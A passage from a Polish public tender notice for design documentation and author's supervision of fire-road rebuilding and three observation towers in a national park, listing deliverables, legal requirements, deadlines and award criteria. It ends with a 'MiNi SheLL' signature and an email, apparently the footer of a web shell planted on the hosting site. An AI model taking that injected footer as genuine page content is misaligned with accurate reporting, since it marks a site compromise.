akceptacji Zamawiającego dla projektu budowlanego przed przystąpieniem do opracowania pozostałej części przedmiotu zamówienia. Ponadto należy uzyskać wszelkie inne uzgodnienia podmiotów zewnętrznych oraz ewentualne odstępstwa od obowiązujących warunków technicznych, celem uzyskania decyzji o pozwoleniu na budowę;3)	opracowanie przedmiarów robót i kosztorysów inwestorskich;4)	opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych;5)	opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;6)	wykonanie niezbędnych opracowań i uzyskanie wszelkich koniecznych uzgodnień i decyzji administracyjnych umożliwiających realizację robót;7)	przygotowanie i złożenie w imieniu Zamawiającego kompletnych wniosków wraz z niezbędną dokumentacją techniczną do właściwego organu administracji architektoniczno-budowlanej, w celu uzyskania decyzji administracyjnych, umożliwiających realizację robót oraz dokonywanie wszelkich zmian i uzupełnień w dokumentacji na etapie ubiegania się o decyzję;8)	dostarczanie na bieżąco Zamawiającemu kopii wszelkiej korespondencji związanej z uzyskaniem niezbędnych opinii, decyzji i uzgodnień, w sposób opisany w umowie;9)	sporządzenie w wersji papierowej odrębnie dla poszczególnych zadań:a)	Projektu koncepcyjnego - 1 egzemplarz,b)	Projektu budowlanego o charakterze projektu wykonawczego - 5 egzemplarzy (1 egzemplarz Wykonawca przekaże Zamawiającemu wraz z dokumentacją określoną w pkt 2)-6), 4 egzemplarze wraz z wnioskiem o pozwolenie na budowę do organu administracji architektoniczno-budowlanej),c)	Kosztorysów inwestorskich - 2 egzemplarze,d)	Przedmiarów robót budowlanych - 2 egzemplarze,e)	Specyfikacji technicznych wykonania i odbioru robót budowlanych - 5 egzemplarzy,f)	Karty Informacyjnej Przedsięwzięcia - 1 egzemplarz,g)	Dokumentacji geotechnicznej - 2 egzemplarze,h)	Mapy do celów projektowych - 1 egzemplarz,10)	sporządzenie w/w dokumentacji w wersji elektronicznej na płycie CD - 2 egz.11)	pełnienie nadzoru autorskiego nad opracowaną dokumentacją techniczno-kosztorysową dla poszczególnych zadań, w ramach którego należy wykonać m.in. następujące czynności:a)	nadzór w toku realizacji robót budowlanych nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową,b)	uzupełnienia szczegółów dokumentacji projektowej oraz wyjaśnienia wątpliwości powstałych w toku realizacji robót,c)	ewentualny udział w naradach technicznych na pisemne wezwanie Zamawiającego. Przyjmuje się, że liczba pobytów projektanta (projektantów) na budowie wynikać będzie z uzasadnionych potrzeb określonych każdorazowo przez Zamawiającego (maksymalnie 3 pobyty),d)	aktualizacja kosztorysów inwestorskich wykonana na wniosek Zamawiającego w celu zgodnego z przepisami prawa zamówień publicznych przeprowadzenia postępowania (jednokrotna w ciągu 3 lat),e)	przygotowanie i dostarczenie odpowiedzi w formie elektronicznej na zapytania na etapie realizacji procedur na roboty budowlane.2.	Dokumentacje techniczno - kosztorysowe na przebudowę dróg pożarowych wykonane w ramach części nr 1, muszą spełniać wymogi § 13.3 rozporządzenia MSWiA z dnia 24 lipca 2009 r. w sprawie przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych tj. droga pożarowa powinna umożliwiać przejazd pojazdów o nacisku osi na nawierzchnię jezdni co najmniej 50 kN, a jej minimalna szerokość nie może być mniejsza niż 3 m oraz spełniać wymogi § 7 rozporządzenia MŚ z dnia 22 marca 2006r. w sprawie szczegółowych zasad zabezpieczenia przeciwpożarowego lasów. 3.	Dokumentacje techniczno- kosztorysowe wykonane w ramach części nr 1 posłużą Zamawiającemu do przygotowania i przeprowadzenia postępowania na wykonanie robót z zastosowaniem ustawy Prawo zamówień publicznych, w związku z tym, winny zostać sporządzone z uwzględnieniem przepisów tej ustawy w szczególności zawartych w art.29-30 p.z.p. 4.	Dokumentacje techniczno- kosztorysowe wykonane w ramach części nr 1 posłużą wykonaniu robót budowlanych na terenie parku narodowego oraz obszarach Natura 2000 na, których obowiązują przepisy ustawy o ochronie przyrody. 5. Zamawiający wymaga od Wykonawcy udzielenia na wykonaną w ramach przedmiotu zamówienia dokumentację techniczno-kosztorysową gwarancję na okres 36 miesięcy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71320000-7, 71247000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie projektanta</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1. Wymagany termin realizacji zamówienia:1) dla dokumentacji techniczno-kosztorysowej: od podpisania umowy do 29 listopada 2019 roku,2) dla pełnienia nadzoru autorskiego: do 31 grudnia 2021 roku. 2. Planowany termin rozpoczęcia nadzoru autorskiego: 2020 rok.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji techniczno-kosztorysowych i pełnienie nadzoru autorskiego nad realizacją robót zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 5.2 do SIWZ Część nr 2 na odbudowę wież widokowych: 1)	zadanie nr 1 - Odbudowa wieży widokowej w O.O. Rąbka, 2)	zadanie nr 2 - Odbudowa wieży widokowej w O.O. Rowy, 3)	zadanie nr 3 - Odbudowa wieży widokowej w O.O. Kluki.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiot zamówienia obejmować będzie:1) działania poprzedzające opracowanie dokumentacji techniczno-kosztorysowej:a)	wykonanie niezbędnych pomiarów inwentaryzacyjnych oraz badań geotechnicznych,b)	opracowanie dokumentacji geotechnicznej,c)	uzyskanie, w razie potrzeby, dodatkowych danych i warunków technicznych oraz postanowień i uzgodnień od innych podmiotów i ewentualnie gestorów sieci,d)	opracowanie mapy sytuacyjno-wysokościowej do celów projektowych wraz z niezbędnymi uzgodnieniami,e)	opracowanie Karty Informacyjnej Przedsięwzięcia (w przypadku obowiązku jej sporządzenia),f)	przygotowanie i złożenie wniosków do właściwego urzędu gminy o wydanie decyzji o środowiskowych uwarunkowaniach na realizację inwestycji, decyzji o lokalizacji inwestycji celu publicznego,g)	w razie nałożenia obowiązku - sporządzenie raportu oddziaływania na środowisko,h)	wykonanie innych opracowań niezbędnych celem uzyskania decyzji o pozwoleniu na budowę,i)	wykonanie projektu koncepcyjnego przedstawiającego minimum 2 warianty rozwiązań - uzyskanie akceptacji Zamawiającego dla jednego z tych wariantów, a dla projektu koncepcyjnego wybranego przez Zamawiającego opracowanie projektu budowlanego,2)	opracowanie i uzgodnienie projektu budowlanego o charakterze projektu wykonawczego wchodzącego w skład dokumentacji techniczno-kosztorysowej oraz uzyskanie ostatecznej akceptacji Zamawiającego dla projektu budowlanego przed przystąpieniem do opracowania pozostałej części przedmiotu zamówienia. Ponadto należy uzyskać wszelkie inne uzgodnienia podmiotów zewnętrznych oraz ewentualne odstępstwa od obowiązujących warunków technicznych, celem uzyskania decyzji o pozwoleniu na budowę;3)	opracowanie przedmiarów robót i kosztorysów inwestorskich;4)	opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych;5)	opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;6)	wykonanie niezbędnych opracowań i uzyskanie wszelkich koniecznych uzgodnień i decyzji administracyjnych umożliwiających realizację robót;7)	przygotowanie i złożenie w imieniu Zamawiającego kompletnych wniosków wraz z niezbędną dokumentacją techniczną do właściwego organu administracji architektoniczno-budowlanej, w celu uzyskania decyzji administracyjnych, umożliwiających realizację robót oraz dokonywanie wszelkich zmian i uzupełnień w dokumentacji na etapie ubiegania się o decyzję;8)	dostarczanie na bieżąco Zamawiającemu kopii wszelkiej korespondencji związanej z uzyskaniem niezbędnych opinii, decyzji i uzgodnień, w sposób opisany w umowie;9)	sporządzenie w wersji papierowej odrębnie dla poszczególnych zadań:a)	Projektu koncepcyjnego - 1 egzemplarz,b)	Projektu budowlanego o charakterze projektu wykonawczego - 5 egzemplarzy (1 egzemplarz Wykonawca przekaże Zamawiającemu wraz z dokumentacją określoną w pkt 2)-6), 4 egzemplarze wraz z wnioskiem o pozwolenie na budowę do organu administracji architektoniczno-budowlanej),c)	Kosztorysów inwestorskich - 2 egzemplarze,d)	Przedmiarów robót budowlanych - 2 egzemplarze,e)	Specyfikacji technicznych wykonania i odbioru robót budowlanych - 5 egzemplarzy,f)	Karty Informacyjnej Przedsięwzięcia - 1 egzemplarz,g)	Dokumentacji geotechnicznej - 2 egzemplarze,h)	Mapy do celów projektowych - 1 egzemplarz,10)	sporządzenie w/w dokumentacji w wersji elektronicznej na płycie CD - 2 egz.11)	pełnienie nadzoru autorskiego nad opracowaną dokumentacją techniczno-kosztorysową dla poszczególnych zadań, w ramach którego należy wykonać m.in. następujące czynności:a)	nadzór w toku realizacji robót budowlanych nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową,b)	uzupełnienia szczegółów dokumentacji projektowej oraz wyjaśnienia wątpliwości powstałych w toku realizacji robót,c)	ewentualny udział w naradach technicznych na pisemne wezwanie Zamawiającego. Przyjmuje się, że liczba pobytów projektanta (projektantów) na budowie wynikać będzie z uzasadnionych potrzeb określonych każdorazowo przez Zamawiającego (maksymalnie 3 pobyty),d)	aktualizacja kosztorysów inwestorskich wykonana na wniosek Zamawiającego w celu zgodnego z przepisami prawa zamówień publicznych przeprowadzenia postępowania (jednokrotna w ciągu 3 lat),e)	przygotowanie i dostarczenie odpowiedzi w formie elektronicznej na zapytania na etapie realizacji procedur na roboty budowlane.2.	Dokumentacje techniczno- kosztorysowe wykonane w ramach części nr 2 posłużą Zamawiającemu do przygotowania i przeprowadzenia postępowania na wykonanie robót z zastosowaniem ustawy Prawo zamówień publicznych, w związku z tym, winny zostać sporządzone z uwzględnieniem przepisów tej ustawy w szczególności zawartych w art.29-30 p.z.p. 3.	Dokumentacje techniczno- kosztorysowe wykonane w ramach części nr 2 posłużą wykonaniu robót budowlanych na terenie parku narodowego oraz obszarach Natura 2000 na, których obowiązują przepisy ustawy o ochronie przyrody. 4. Zamawiający wymaga od Wykonawcy udzielenia na wykonaną w ramach przedmiotu zamówienia dokumentację techniczno-kosztorysową gwarancję na okres 36 miesięcy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71320000-7, 71247000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie projektanta</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1. Wymagany termin realizacji zamówienia:1) dla dokumentacji techniczno-kosztorysowej: od podpisania umowy do 29 listopada 2019 roku,2) dla pełnienia nadzoru autorskiego: do 31 grudnia 2021 roku. 2. Planowany termin rozpoczęcia nadzoru autorskiego: 2020 rok.<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com